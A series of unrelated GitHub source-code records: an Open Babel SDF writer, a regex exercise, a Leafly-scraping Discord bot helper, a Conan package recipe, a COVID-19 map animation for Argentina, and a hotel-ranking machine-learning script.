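A minimal Open Babel round trip (not from the source) using the same conversion objects as write_sdf above — read a SMILES string and emit an SDF block:

from openbabel import openbabel

conv = openbabel.OBConversion()
conv.SetInAndOutFormats("smi", "sdf")
mol = openbabel.OBMol()
conv.ReadString(mol, "CCO")   # ethanol
mol.AddHydrogens()
sdf_text = conv.WriteString(mol)
print(sdf_text.splitlines()[3])  # the counts line: atom and bond counts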
About {t_left} seconds remaining.\"\n )\n last_t = t1\n last_percent = percent\n\n if printer:\n t1 = time.time()\n rate = structure_no / (t1 - t0)\n printer(\n f\" Wrote {structure_no - 1} structures in {t1 - t0:.1f} seconds = \"\n f\"{rate:.2f} per second\"\n )\n\n if references:\n # Add the citations for Open Babel\n references.cite(\n raw=bibliography[\"openbabel\"],\n alias=\"openbabel_jcinf\",\n module=\"read_structure_step\",\n level=1,\n note=\"The principle Open Babel citation.\",\n )\n\n # See if we can get the version of obabel\n if OpenBabel_version is None:\n path = shutil.which(\"obabel\")\n if path is not None:\n path = Path(path).expanduser().resolve()\n try:\n result = subprocess.run(\n [str(path), \"--version\"],\n stdin=subprocess.DEVNULL,\n capture_output=True,\n text=True,\n )\n except Exception:\n OpenBabel_version = \"unknown\"\n else:\n OpenBabel_version = \"unknown\"\n lines = result.stdout.splitlines()\n for line in lines:\n line = line.strip()\n tmp = line.split()\n if len(tmp) == 9 and tmp[0] == \"Open\":\n OpenBabel_version = {\n \"version\": tmp[2],\n \"month\": tmp[4],\n \"year\": tmp[6],\n }\n break\n\n if isinstance(OpenBabel_version, dict):\n try:\n template = string.Template(bibliography[\"obabel\"])\n\n citation = template.substitute(\n month=OpenBabel_version[\"month\"],\n version=OpenBabel_version[\"version\"],\n year=OpenBabel_version[\"year\"],\n )\n\n references.cite(\n raw=citation,\n alias=\"obabel-exe\",\n module=\"read_structure_step\",\n level=1,\n note=\"The principle citation for the Open Babel executables.\",\n )\n except Exception:\n pass\n\n return configurations\n","repo_name":"molssi-seamm/read_structure_step","sub_path":"read_structure_step/formats/sdf/sdf.py","file_name":"sdf.py","file_ext":"py","file_size_in_byte":17116,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"69955147450","text":"import re\n\norder = input()\n\npattern = r\">>\\b\\w+<<\\b\\d+(\\.\\d+)?!\\b\\d+\\b\"\nresult = {'name': [], 'price': []}\n\nwhile order != \"Purchase\":\n item = re.finditer(pattern, order)\n\n for i in item:\n item = re.findall(r\"[^<>!]+\", i.group())\n result['name'].append(item[0])\n result['price'].append(float(item[1]) * int(item[2]))\n\n order = input()\n\nprint(\"Bought furniture:\")\n[print(name) for name in result['name']]\nprint(f\"Total money spend: {sum(result['price']):.2f}\")\n","repo_name":"xMrShadyx/SoftUni","sub_path":"Python Fundamentals - September 2020/18_Regular_Expressions_Exercise/05_Furniture.py","file_name":"05_Furniture.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"77"} +{"seq_id":"8561400523","text":"import discord\r\nfrom discord_slash.utils.manage_components import *\r\nfrom wsclasses import *\r\nfrom urllib.request import urlopen, Request\r\nfrom urllib.error import HTTPError\r\nfrom urllib.parse import urlencode, quote_plus\r\nfrom bs4 import BeautifulSoup as bs\r\nfrom googlesearch import search\r\n\r\nfeelingslist = ['Aroused', 'Creative', 'Energetic', 'Euphoric', 'Focused', 'Giggly', 'Happy', 'Hungry', 'Relaxed', 'Sleepy', 'Talkative', 'Tingly', 'Uplifted']\r\nneglist = ['Anxious', 'Dizzy', 'Dry eyes', 'Dry mouth', 'Headache', 'Paranoid']\r\nhelplist = ['ADD/ADHD', 'Alzheimer\\'s', 'Anorexia', 'Anxiety', 'Arthritis', 'Asthma', 'Bipolar disorder', 'Cachexia', 'Cancer', 'Cramps', 'Crohn\\'s disease', 'Depression', 'Epilepsy', 'Eye pressure', 'Fatigue', 
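A quick self-contained check (not from the source) of the furniture regex in the record above — each valid order line has the form >>name<<price!quantity:

import re

pattern = r">>\b\w+<<\b\d+(\.\d+)?!\b\d+\b"
line = ">>Sofa<<312.23!3 >>Mirror<<500!2"
total = 0.0
for match in re.finditer(pattern, line):
    name, price, qty = re.findall(r"[^<>!]+", match.group())[:3]
    print(name)
    total += float(price) * int(qty)
print(f"Total money spent: {total:.2f}")  # 1936.69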
'Fibromyalgia', 'Gastrointestinal disorder', 'Glaucoma', 'Headaches', 'HIV/AIDS', 'Hypertension', 'Inflammation', 'Insomnia', 'Lack of appetite', 'Migraines', 'Multiple sclerosis', 'Muscle spasms', 'Muscular dystrophy', 'Nausea', 'Pain', 'Parkinson\\'s', 'Phantom limb pain', 'PMS', 'PTSD', 'Seizures', 'Spasticity', 'Spinal cord injury', 'Stress', 'Tinnitus', 'Tourette\\'s syndrome']\r\n\r\n\r\nasync def leaflyinfo(query): # Gets search results and returns message embed\r\n #link = Request(\"https://www.leafly.com/search?q=\" + quote_plus(query) + \"&searchCategory=strain\", headers={'Accept': 'text/html', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36 OPR/86.0.4363.64'})\r\n #print(quote_plus(query))\r\n #try:\r\n # info = urlopen(link) # Grab html\r\n #except HTTPError as e:\r\n # info = e.read()\r\n \r\n #bssearch = bs(info, 'html.parser') # Converts to BeautifulSoup object\r\n #print(bssearch)\r\n #if bssearch.head.title.get_text() == '500: Internal Server Error':\r\n # return None\r\n\r\n # results = bssearch.find_all(class_='relative flex flex-col justify-between bg-white h-full elevation-low rounded')\r\n # Grabs each 'box''s div element\r\n results = search(term=f'{query.lower()} site:leafly.com/strains', num_results=2, advanced=True)\r\n isset = False\r\n for result in results:\r\n print(result.title)\r\n if not isset:\r\n isset=True\r\n rslt = result.url\r\n if query.lower() in result.title:\r\n \r\n return result.url\r\n # If the strain name matches the query exactly (except case)\r\n \r\n return rslt\r\n # If the above three fail, just return the first result\r\n\r\n \r\n\r\nasync def leaflyresultmessage(ctx, link):\r\n\r\n url = link\r\n link = Request(url=link, headers={'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36 OPR/79.0.4143.50'})\r\n try:\r\n info = urlopen(link) # Grab html\r\n except HTTPError as e:\r\n info = e.read()\r\n bssearch = bs(info, 'html.parser') # Converts to BeautifulSoup object\r\n print(bssearch)\r\n name = bssearch.find('h1', attrs={'itemprop':'name'}).get_text()\r\n aka = bssearch.find('h2', attrs={'itemprop':'name'})\r\n try:\r\n aka = aka.get_text().replace('aka','').strip()\r\n desc = '*(aka:* ***' + aka + '*** *)*\\n\\n' + '__**Description:**__\\n\\n' + bssearch.find('div', itemprop='description').get_text()\r\n except AttributeError:\r\n desc = '__**Description:**__\\n' + bssearch.find('div', itemprop='description').get_text()\r\n weedpic = bssearch.find('picture', attrs={'data-testid':'image-picture-element'}).img['srcset'].split('?', 1)[0]\r\n\r\n\r\n newEmbed = discord.Embed(title=name, url=url)\r\n newEmbed.description = desc[:2048]\r\n # newEmbed.add_field(name='Description:', value=desc)\r\n newEmbed.set_thumbnail(url=weedpic)\r\n newEmbed.set_footer(text='(Strain information courtesy Leafly.com)')\r\n \r\n # if bssearch.find(string='ve smoked, dabbed, or otherwise enjoyed this strain') != None:\r\n try:\r\n indicapercent = int(bssearch.find(class_='bg-default rounded-full')['style'].split('width:')[1].split('.')[0])\r\n\r\n # bar = '`'\r\n # for x in range(int(indicapercent * 38 / 100)):\r\n # bar = bar + '█'\r\n # for x in range(int((100 - indicapercent) * 38 / 100)):\r\n # bar = bar + '∙'\r\n # bar = bar + '`'\r\n # newEmbed.add_field(name='Indica <━━━━━━━━━━━━━━━> Sativa', value=bar, inline=False)\r\n newEmbed.add_field(name='__Type__', value=str(indicapercent)+'% 
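A self-contained illustration (not from the source) of the BeautifulSoup lookups used in leaflyresultmessage above, run on an inline HTML snippet instead of a live page; the strain name and text are made up:

from bs4 import BeautifulSoup as bs

html = ('<h1 itemprop="name">Example Strain</h1>'
        '<div itemprop="description">A made-up description.</div>')
soup = bs(html, 'html.parser')
print(soup.find('h1', attrs={'itemprop': 'name'}).get_text())  # Example Strain
print(soup.find('div', itemprop='description').get_text())     # A made-up description.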
Indica')\r\n except Exception as e:\r\n print(e)\r\n pass\r\n cannabinoids = [] \r\n cannabinoids = bssearch.find_all('span', class_='text-xs rounded flex items-center mr-xl')\r\n\r\n if len(cannabinoids) >= 1:\r\n newEmbed.add_field(name='__'+cannabinoids[0].get_text().split()[0].strip('Loading...')+'__', value=cannabinoids[0].get_text().split()[1])\r\n if len(cannabinoids) >= 2:\r\n newEmbed.add_field(name='__'+cannabinoids[1].get_text().split()[0].strip('Loading...')+'__', value=cannabinoids[1].get_text().split()[1])\r\n if len(cannabinoids) >= 3:\r\n newEmbed.add_field(name='__'+cannabinoids[2].get_text().split()[0].strip('Loading...')+'__', value=cannabinoids[2].get_text().split()[1])\r\n if len(cannabinoids) >= 4:\r\n newEmbed.add_field(name='__'+cannabinoids[3].get_text().split()[0].strip('Loading...')+'__', value=cannabinoids[3].get_text().split()[1])\r\n\r\n try:\r\n domterp = bssearch.find('a', attrs={'aria-label':'Terpene Information'}).get_text()\r\n newEmbed.add_field(name='__Dominant Terp__', value=domterp)\r\n except Exception as e:\r\n print(e)\r\n pass\r\n possibleflavs=['Ammonia', 'Apple', 'Apricot', 'Berry', 'Blueberry', 'Blue Cheese', 'Butter', 'Cheese', 'Chemical', 'Chestnut', 'Citrus', 'Coffee', 'Diesel',\r\n 'Earthy', 'Flowery', 'Grape', 'Grapefruit', 'Honey', 'Lavender', 'Lemon', 'Lime', 'Mango', 'Menthol', 'Mint', 'Nutty', 'Orange', 'Peach',\r\n 'Pear', 'Pepper', 'Pine', 'Pineapple', 'Plum', 'Pungent', 'Rose', 'Sage', 'Skunk', 'Spicy/Herbal', 'Strawberry', 'Sweet', 'Tar', 'Tea',\r\n 'Tobacco', 'Tree fruit', 'Tropical', 'Vanilla', 'Violet', 'Woody']\r\n flavs = ''\r\n for res in bssearch.find_all('a', href='/strains/lists/effect/'):\r\n if res.get_text() in possibleflavs:\r\n flavs += f'{res.get_text()}\\n'\r\n\r\n if flavs != '':\r\n flavs.strip('\\n')\r\n newEmbed.add_field(name='__Flavors__', value=flavs)\r\n\r\n\r\n try:\r\n feelings = bssearch.find(id='Feelings-tab').find_all(p)\r\n effects = ''\r\n for feeling in feelings:\r\n effects += feeling.get_text() + '\\n'\r\n effects.strip('\\n')\r\n newEmbed.add_field(name='__Feelings__', value=effects)\r\n except Exception as e:\r\n print(e)\r\n pass\r\n try:\r\n negatives = bssearch.find(id='Negatives-tab').find_all(p)\r\n effects = ''\r\n for neg in negatives:\r\n effects += neg.get_text() + '\\n'\r\n effects.strip('\\n')\r\n newEmbed.add_field(name='__Negatives__', value=effects)\r\n except Exception as e:\r\n print(e)\r\n pass\r\n return newEmbed\r\n\r\n\r\n","repo_name":"PapaKool/WhatStrain","sub_path":"lfuncts.py","file_name":"lfuncts.py","file_ext":"py","file_size_in_byte":6816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"31942431295","text":"from conan import ConanFile\nfrom conan.tools.build import check_min_cppstd\nfrom conan.tools.cmake import CMake, CMakeToolchain, cmake_layout\nfrom conan.tools.files import apply_conandata_patches, copy, export_conandata_patches, get, replace_in_file, rmdir\nimport os\n\nrequired_conan_version = \">=1.53.0\"\n\n\nclass GlbindingConan(ConanFile):\n name = \"glbinding\"\n description = \"A C++ binding for the OpenGL API, generated using the gl.xml specification.\"\n license = \"MIT\"\n topics = (\"opengl\", \"binding\")\n homepage = \"https://glbinding.org/\"\n url = \"https://github.com/conan-io/conan-center-index\"\n\n package_type = \"library\"\n settings = \"os\", \"arch\", \"compiler\", \"build_type\"\n options = {\n \"shared\": [True, False],\n \"fPIC\": [True, False],\n }\n default_options = {\n 
\"shared\": False,\n \"fPIC\": True,\n }\n\n def export_sources(self):\n export_conandata_patches(self)\n\n def config_options(self):\n if self.settings.os == \"Windows\":\n del self.options.fPIC\n\n def configure(self):\n if self.options.shared:\n self.options.rm_safe(\"fPIC\")\n\n def layout(self):\n cmake_layout(self, src_folder=\"src\")\n\n def validate(self):\n if self.settings.compiler.get_safe(\"cppstd\"):\n check_min_cppstd(self, 11)\n\n def source(self):\n get(self, **self.conan_data[\"sources\"][self.version], strip_root=True)\n\n def generate(self):\n tc = CMakeToolchain(self)\n tc.cache_variables[\"BUILD_SHARED_LIBS\"] = self.options.shared\n tc.cache_variables[\"OPTION_SELF_CONTAINED\"] = False\n tc.cache_variables[\"OPTION_BUILD_TESTS\"] = False\n tc.cache_variables[\"OPTION_BUILD_DOCS\"] = False\n tc.cache_variables[\"OPTION_BUILD_TOOLS\"] = False\n tc.cache_variables[\"OPTION_BUILD_EXAMPLES\"] = False\n tc.cache_variables[\"OPTION_BUILD_WITH_BOOST_THREAD\"] = False\n tc.cache_variables[\"OPTION_BUILD_CHECK\"] = False\n # TODO: might be a good idea to fix upstream CMakeLists to not rely on\n # WriteCompilerDetectionHeader, and just use cxx_std_11 compile feature\n tc.cache_variables[\"CMAKE_POLICY_DEFAULT_CMP0120\"] = \"OLD\"\n tc.generate()\n\n def _patch_sources(self):\n apply_conandata_patches(self)\n compile_options = os.path.join(self.source_folder, \"cmake\", \"CompileOptions.cmake\")\n cmakelists = os.path.join(self.source_folder, \"CMakeLists.txt\")\n # Don't force PIC\n replace_in_file(self, compile_options, \"POSITION_INDEPENDENT_CODE ON\", \"\")\n # Don't replace /W3 by /W4\n replace_in_file(self, compile_options, \"/W4\", \"\")\n # No whole program optimization\n replace_in_file(self, compile_options, \"/GL\", \"\")\n # Don't populate rpath\n replace_in_file(self, cmakelists, \"if(NOT SYSTEM_DIR_INSTALL)\", \"if(0)\")\n\n def build(self):\n self._patch_sources()\n cmake = CMake(self)\n cmake.configure()\n cmake.build()\n\n def package(self):\n copy(self, \"LICENSE\", src=self.source_folder, dst=os.path.join(self.package_folder, \"licenses\"))\n cmake = CMake(self)\n cmake.install()\n rmdir(self, os.path.join(self.package_folder, \"cmake\"))\n rmdir(self, os.path.join(self.package_folder, \"share\"))\n\n def package_info(self):\n self.cpp_info.set_property(\"cmake_file_name\", \"glbinding\")\n\n suffix = \"d\" if self.settings.build_type == \"Debug\" else \"\"\n # glbinding\n self.cpp_info.components[\"_glbinding\"].set_property(\"cmake_target_name\", \"glbinding::glbinding\")\n self.cpp_info.components[\"_glbinding\"].libs = [\"glbinding\" + suffix]\n self.cpp_info.components[\"_glbinding\"].requires = [\"khrplatform\"]\n if self.settings.os in [\"Linux\", \"FreeBSD\"]:\n self.cpp_info.components[\"_glbinding\"].system_libs = [\"dl\", \"pthread\"]\n # glbinding-aux\n self.cpp_info.components[\"glbinding-aux\"].set_property(\"cmake_target_name\", \"glbinding::glbinding-aux\")\n self.cpp_info.components[\"glbinding-aux\"].libs = [\"glbinding-aux\" + suffix]\n self.cpp_info.components[\"glbinding-aux\"].requires = [\"_glbinding\"]\n # KHRplatform\n self.cpp_info.components[\"khrplatform\"].set_property(\"cmake_target_name\", \"glbinding::KHRplatform\")\n self.cpp_info.components[\"khrplatform\"].libdirs = []\n\n # workaround to propagate all components in CMakeDeps generator\n self.cpp_info.set_property(\"cmake_target_name\", \"glbinding::glbinding-aux\")\n\n # TODO: to remove in conan v2 once cmake_find_package_* generators removed\n 
self.cpp_info.names[\"cmake_find_package\"] = \"glbinding\"\n self.cpp_info.names[\"cmake_find_package_multi\"] = \"glbinding\"\n self.cpp_info.components[\"_glbinding\"].names[\"cmake_find_package\"] = \"glbinding\"\n self.cpp_info.components[\"_glbinding\"].names[\"cmake_find_package_multi\"] = \"glbinding\"\n self.cpp_info.components[\"glbinding-aux\"].names[\"cmake_find_package\"] = \"glbinding-aux\"\n self.cpp_info.components[\"glbinding-aux\"].names[\"cmake_find_package_multi\"] = \"glbinding-aux\"\n self.cpp_info.components[\"khrplatform\"].names[\"cmake_find_package\"] = \"KHRplatform\"\n self.cpp_info.components[\"khrplatform\"].names[\"cmake_find_package_multi\"] = \"KHRplatform\"\n","repo_name":"conan-io/conan-center-index","sub_path":"recipes/glbinding/all/conanfile.py","file_name":"conanfile.py","file_ext":"py","file_size_in_byte":5308,"program_lang":"python","lang":"en","doc_type":"code","stars":835,"dataset":"github-code","pt":"77"} +{"seq_id":"13541055784","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Oct 3 19:00:31 2020\n\n@author: fernando\n\"\"\"\n\ndef MapaCOVID(Provincia, fecha):\n \"\"\"\n Hace una animacion\n \"\"\"\n \n \n ###################### CARGA MAPA ###################################\n if Provincia==\"AMBA\":\n MapaProv=geopandas.read_file(\"Data/GeoData/AMBA.json\")\n MapaProv.insert(9, \"Infectados\", 0.0)\n MapaProv.index=MapaProv.in1\n elif Provincia==\"Todas\":\n MapaCABA=geopandas.read_file(\"Data/GeoData/AMBA.json\").loc[0]\n MapaProv=geopandas.read_file(\"Data/GeoData/departamento.json\")\n MapaProv=MapaProv[[not h[:2]=='02' for h in MapaProv.in1]]\n MapaCABA.in1='02000'\n MapaProv=MapaProv.append(MapaCABA)\n MapaProv.insert(9, \"Infectados\", 0.0)#isertar columna nueva\n MapaProv.index=MapaProv.in1\n else:\n Arg=geopandas.read_file(\"Data/GeoData/departamento.json\")\n CodProv=str(codigo.Cod[Provincia]).zfill(2)\n MapaProv=Arg[[h[:2]==CodProv for h in Arg['in1']]]\n MapaProv.insert(9, \"Infectados\", 0.0)#isertar columna nueva\n MapaProv.index=MapaProv.in1\n\n ###################### CARGA DATOS #####################################\n DataProv=readDataArg(Provincia)\n I1=DataProv.fecha_apertura>=fecha[0]\n I2=DataProv.fecha_apertura<=fecha[1]\n DataProv=DataProv[I1 & I2]\n \n \n# if Provincia==\"AMBA\":\n# #DataProv[DataProv.residencia_provincia_nombre=='CABA']\n# CasosCABA=len(DataProv[DataProv.residencia_provincia_nombre=='CABA'])\n# MapaProv.at['02',\"Infectados\"]=CasosCABA\n# DataProv=DataProv[DataProv.residencia_provincia_id==6]\n# DataI=DataProv.residencia_departamento_id.value_counts()\n# for h in DataI.index:\n# #if not(h==0):\n# id='06'+str(h).zfill(3)\n# MapaProv.at[id,\"Infectados\"]=DataI[h]\n# elif Provincia==\"Todas\":\n# InfCABA=DataProv.residencia_provincia_nombre.value_counts()['CABA']\n# MapaProv.at['02000','Infectados']=InfCABA\n# I=[not h=='CABA' for h in DataProv.residencia_provincia_nombre]\n# DataProv=DataProv[I]\n# \n# I1=DataProv.residencia_provincia_id.apply(str).str.zfill(2)\n# I2=DataProv.residencia_departamento_id.apply(str).str.zfill(3)\n# DataProv.at[:,'id']=I1+I2\n# \n# DataI=DataProv.id.value_counts()\n# \n# for h in DataI.index:\n# MapaProv.at[h,\"Infectados\"]=DataI[h]\n# \n# else:\n \n ############ pARA OTRAS PROVINCIAS ESTO VENIA DESPUES DEL ELSE\n\n\n I=datetimeIterator(pd.to_datetime(fecha[0]),pd.to_datetime(fecha[1]))\n\n\n i=0\n for fecha_foto in I:\n MapaProv.loc[:,\"Infectados\"]=0.0\n I1=DataProv.fecha_apertura<=str(fecha_foto)[:10]\n 
DataI=DataProv[I1].residencia_departamento_id.value_counts()\n        for h in DataI.index:\n            id=CodProv+str(h).zfill(3)\n            MapaProv.at[id,\"Infectados\"]=2*DataI[h]\n        MapaProv_points = MapaProv.copy()\n        MapaProv_points['geometry'] = MapaProv_points['geometry'].centroid \n        fig=plt.figure(figsize=(8,10))\n        ax=fig.add_axes([0,0.01,1,.95])\n        MapaProv.plot(ax=ax, color=\"white\", edgecolor=\"grey\", linewidth=2)\n        MapaProv_points.plot(ax=ax,color=\"#e63131\", markersize=\"Infectados\",\n                             alpha=0.7, categorical=False, legend=True )\n        \n        titulo=str(fecha_foto)[:10]\n        \n        file_name=str(i).zfill(3)+'.png'\n        ax.set_title(titulo,fontsize=20)\n        ax.axes.xaxis.set_visible(False)\n        ax.axes.yaxis.set_visible(False)\n        plt.savefig(file_name)\n        plt.close()\n        i=i+1\n    \n    return []\n    \n    \n\ndef readDataArg(Provincia):\n    \"\"\"\n    Reads data from the database downloaded from the Ministry of Health of\n    the Argentine Republic.\n    \n    Parameters:\n        Provincia: string, an Argentine province.\n    Returns:\n        Pandas DataFrame with all the columns of the original database.\n    \"\"\"\n    \n    \n    Data=pd.read_csv(\"Data/Epidemic/Covid19Casos.csv\")\n    Data=Data[Data.clasificacion_resumen==\"Confirmado\"]\n    if Provincia=='AMBA':\n        DataAMBA=geopandas.read_file('Data/GeoData/AMBA.json')\n        # The first entry is CABA; it is read differently\n        I1=[int(i[2:]) for i in DataAMBA.in1.values[1:]]\n        I2=Data['residencia_provincia_id']==6\n        I3=Data['residencia_departamento_id'].isin(I1)\n        I4=Data['residencia_provincia_id']==2\n        I= (I3 & I2) | I4 \n\n        DataProv=Data.loc[I]\n    elif Provincia==\"Todas\":\n        DataProv=Data\n    else:\n        CodProv=codigo.Cod[Provincia]\n        I=Data.residencia_provincia_id==CodProv \n        DataProv=Data[I] \n    return DataProv\n\ndef datetimeIterator(from_date=datetime.now(), to_date=None):\n    while to_date is None or from_date <= to_date:\n        yield from_date\n        from_date = from_date + timedelta(days = 1)\n    return\n\n################# LIBRARIES ###############################################\nimport pandas as pd\nimport geopandas\nimport matplotlib.pyplot as plt\n#from mpl_toolkits.axes_grid1 import make_axes_locatable\nfrom matplotlib import cm\nimport numpy as np\n#from shapely.geometry import Point, Polygon\nfrom datetime import datetime,timedelta\n\n\n################# GLOBAL VARIABLES ##########################################\n\n\n\n###################### PROVINCE CODES ##################################\ncodigo=pd.read_csv('Data/GeoData/CodProv.csv')\ncodigo.index=codigo.Provincia","repo_name":"fdmazzone/COVID-19","sub_path":"Modelizacion_Pandemia_Real/programas/animacion.py","file_name":"animacion.py","file_ext":"py","file_size_in_byte":5490,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} {"seq_id":"22029165237","text":"from sklearn.ensemble import RandomForestClassifier, RandomForestRegressor, AdaBoostRegressor\nfrom sklearn.ensemble import GradientBoostingRegressor\nfrom sklearn.datasets import make_friedman1\nfrom sklearn.metrics import mean_squared_error\nimport sklearn.model_selection as ms\nimport sklearn.feature_extraction as fe\n\nimport pandas as pd\nfrom matplotlib import rcParams\nimport matplotlib.pyplot as plt\nimport pickle\nimport util.plot\nimport util.data\nimport util.ndcg\nimport numpy as np\nfrom pandas.plotting import scatter_matrix\n\n\ndata = pd.read_csv('data/training_set_VU_DM_clean.csv', sep=';')\ncolumns = list(data.columns)\nsrchIdList = np.unique(data['srch_id'])\ntrainID, testID = ms.train_test_split(srchIdList, random_state=42, 
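A small self-contained check (not from the source) of the datetimeIterator generator defined above: it yields one datetime per day, inclusive of both endpoints.

from datetime import datetime, timedelta

def datetime_iterator(from_date, to_date=None):
    while to_date is None or from_date <= to_date:
        yield from_date
        from_date = from_date + timedelta(days=1)

days = list(datetime_iterator(datetime(2020, 3, 1), datetime(2020, 3, 5)))
print(len(days), days[0].date(), days[-1].date())  # 5 2020-03-01 2020-03-05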
test_size=0.4)\ntrain = data[data['srch_id'].isin(trainID)]\ntest = data[data['srch_id'].isin(testID)]\n#train, test = ms.train_test_split(data, random_state=42, test_size=0.3)\nyLab = list(['click_bool', 'booking_bool', 'score', 'position'])\ntrainY = train[yLab]\ntrainX = train.drop(yLab, axis=1)\ntestY = test[yLab]\n\ntestX = test.drop(yLab, axis=1)\n\nnp.random.seed(424242)\n\nbools = [k for k in list(trainX.columns) if 'bool' in k]\nisNulls = [k for k in list(trainX.columns) if 'is_null' in k]\nweekDays = ['Friday',\n 'Monday',\n 'Saturday',\n 'Sunday',\n 'Thursday',\n 'Tuesday',\n 'Other']\nweekDays = ['weekday_' + k for k in weekDays]\ncomps = ['unavailable_comp',\n 'available_comp',\n 'avg_price_comp']\notherSelection = ['has_historical_price',\n # 'travel_distances',\n 'delta_starrating',\n 'srch_query_affinity_score',\n 'price_usd',\n 'promotion_flag',\n 'prop_location_score1',\n 'prop_location_score2',\n 'srch_adults_per_room_score',\n 'srch_person_per_room_score']\ndateTimes = ['day',\n 'hour']\nvarsUsed = bools + isNulls + weekDays + comps + otherSelection\n# varsUsed = ['visitor_hist_starrating',\n# 'visitor_hist_adr_usd',\n# 'prop_starrating',\n# 'prop_review_score',\n# 'prop_brand_bool',\n# 'prop_location_score1',\n# 'prop_location_score2',\n# 'prop_log_historical_price',\n# 'price_usd',\n# 'promotion_flag',\n# 'srch_length_of_stay',\n# 'srch_booking_window',\n# 'srch_adults_count',\n# 'srch_children_count',\n# 'srch_room_count',\n# 'srch_saturday_night_bool',\n# 'srch_query_affinity_score',\n# 'visitor_hist_starrating_is_null',\n# 'day',\n# 'hour',\n# 'srch_person_per_room',\n# 'Friday',\n# 'Monday',\n# 'Saturday',\n# 'Sunday',\n# 'Thursday',\n# 'Tuesday']\n\n# start training models below\n\nfor k in varsUsed:\n if k not in trainX.columns:\n print(k)\n varsUsed.remove(k)\n\nest = GradientBoostingRegressor(n_estimators=100, learning_rate=0.1,\n max_depth=1, random_state=0, loss='ls').fit(trainX[varsUsed], trainY)\nprint(mean_squared_error(testY, est.predict(testX[varsUsed])))\nest.feature_importances_\n\nrfest = RandomForestClassifier(n_estimators=100, max_depth=2, random_state=0)\nrfest.fit(trainX[varsUsed], trainY[list(['click_bool', 'booking_bool'])])\na4 = rfest.predict(testX[varsUsed])\nprint(mean_squared_error(testY['click_bool']+5*testY['booking_bool'], a4[:,0]+5*a4[:,1] ))\na2 = rfest.predict(testX[varsUsed])\nrfest_tuned_parameters = [{'max_depth':[1,2,4,5],'n_estimators':[50,100,150,200,300]}]\nrfestGS = ms.GridSearchCV(RandomForestClassifier(),rfest_tuned_parameters,cv=5,scoring='neg_mean_squared_error')\nrfestGS.fit(trainX[varsUsed],trainY[list(['click_bool', 'booking_bool'])])\n\nrfReg = RandomForestRegressor(n_estimators=100)\nrfReg.fit(trainX[varsUsed], trainY['score'])\na3 = rfReg.predict(testX[varsUsed])\nprint(mean_squared_error(testY['score'], est.predict(testX[varsUsed])))\nrfreg_tuned_parameters = [{'max_depth':[1,2,3],'n_estimators':[50,100,150,200]}]\nrfregGS = ms.GridSearchCV(RandomForestRegressor(),rfreg_tuned_parameters,cv=5,scoring='neg_mean_squared_error')\nrfregGS.fit(trainX[varsUsed],trainY['score'])\na1 = ms.ParameterGrid(rfreg_tuned_parameters)\nscoresave = np.zeros(len(a1))\nfor i in range(len(a1)):\n rfregmgs = RandomForestRegressor(**a1[i])\n rfregmgs.fit(trainX[varsUsed],trainY['score']) \n y_pred = rfregmgs.predict(testX[varsUsed])\n ndcg = util.ndcg.ndcg(testX[['srch_id','prop_id']], testY['score'], y_pred)\n ndcg\n scoresave[i] = ndcg\n \nadaReg = 
AdaBoostRegressor()\nadaReg.fit(trainX[varsUsed],trainY['score'])\nprint(mean_squared_error(testY['score'],adaReg.predict(testX[varsUsed])))\nada_tuned_parameters = [{'loss':['linear','square'],'learning_rate':[0.5,1,2],'n_estimators':[50,100,150,25]}]\nadaGS = ms.GridSearchCV(AdaBoostRegressor(),ada_tuned_parameters,cv=5,scoring='neg_mean_squared_error')\nadaGS.fit(trainX[varsUsed],trainY['score'])\nprint(adaGS.score(testY['score'],adaGS.predict(testX[varsUsed])))\nprint(adaGS.best_params_)\nprint(adaGS.best_score_)\n#predMat = pd.DataFrame()\n\nrfReg = RandomForestRegressor(n_estimators=100)\nrfReg.fit(trainX[varsUsed], trainY['score'])\nest = GradientBoostingRegressor(n_estimators=100, learning_rate=0.1,\n max_depth=1, random_state=0, loss='ls').fit(trainX[varsUsed], trainY['score'])\n\nadaTestX = testX[['srch_id','prop_id']]\nadaTestY = testY\nadaTestY['srch_id'] = testX['srch_id']\nadaTestX['score'] = adaReg.predict(testX[varsUsed])\n# sort test set predicted scores from high scores to low scores\nadaTestX = adaTestX.iloc[1:100000,:]\nadaTestY = adaTestY.iloc[1:100000,:]\n\nadaTestX = adaTestX.sort_values(['srch_id', 'score'], ascending=[True, False])\n\n# create new column to store position of prop_id\nadaTestX['position'] = pd.Series()\n\n\n\n\n# fit model to test set\ny_pred = adaReg.predict(testX[varsUsed])\n# X_test['score'] = preds\n\n\n# calculate dcg of test set per srch_id\nXy_pred = util.data.Xy_pred(testX[['srch_id','prop_id']], y_pred)\n\n# put true y values on indexes, do not sort !\nXy_pred['score'] = testY['score']\n\n# calculate ideal dcg of test set per srch_id\nXy_true = util.data.Xy_pred(testX[['srch_id','prop_id']], testY['score'])\n\n# calculate NDCG\nndcg = util.ndcg.ndcg(testX[['srch_id','prop_id']], testY['score'], y_pred)\nndcg\n\n\n\n\n\nfinalTestSet = pd.read_csv('data/test_set_VU_DM_clean-001.csv', sep=';')\nfinaltestPred = est.predict(finalTestSet[varsUsed])\nfinalFrame = finalTestSet[['srch_id','prop_id']]\nfinalFrame['scores'] = finaltestPred\nfinalFrame = finalFrame.sort_values(['srch_id','scores'], ascending=[True,False])\nfinalFrame = finalFrame.drop(['scores'],axis=1)\nfinalFrame.to_csv('data/FinalPreds.csv',index=False)\n\n\n\n\n\n\n\n'''\n# save position prop_id\nprev_srch_id = -1\nfor i in adaTestX.index.tolist():\n row = adaTestX.loc[i]\n # compute position\n if prev_srch_id != row.srch_id:\n position = 1\n prev_srch_id = row.srch_id\n else:\n position += 1\n \n # save position value to X_test\n adaTestX.loc[i, 'position'] = int(position)\n\n # to calculate the DCG of the test set old scores have to be used instead of the predicted 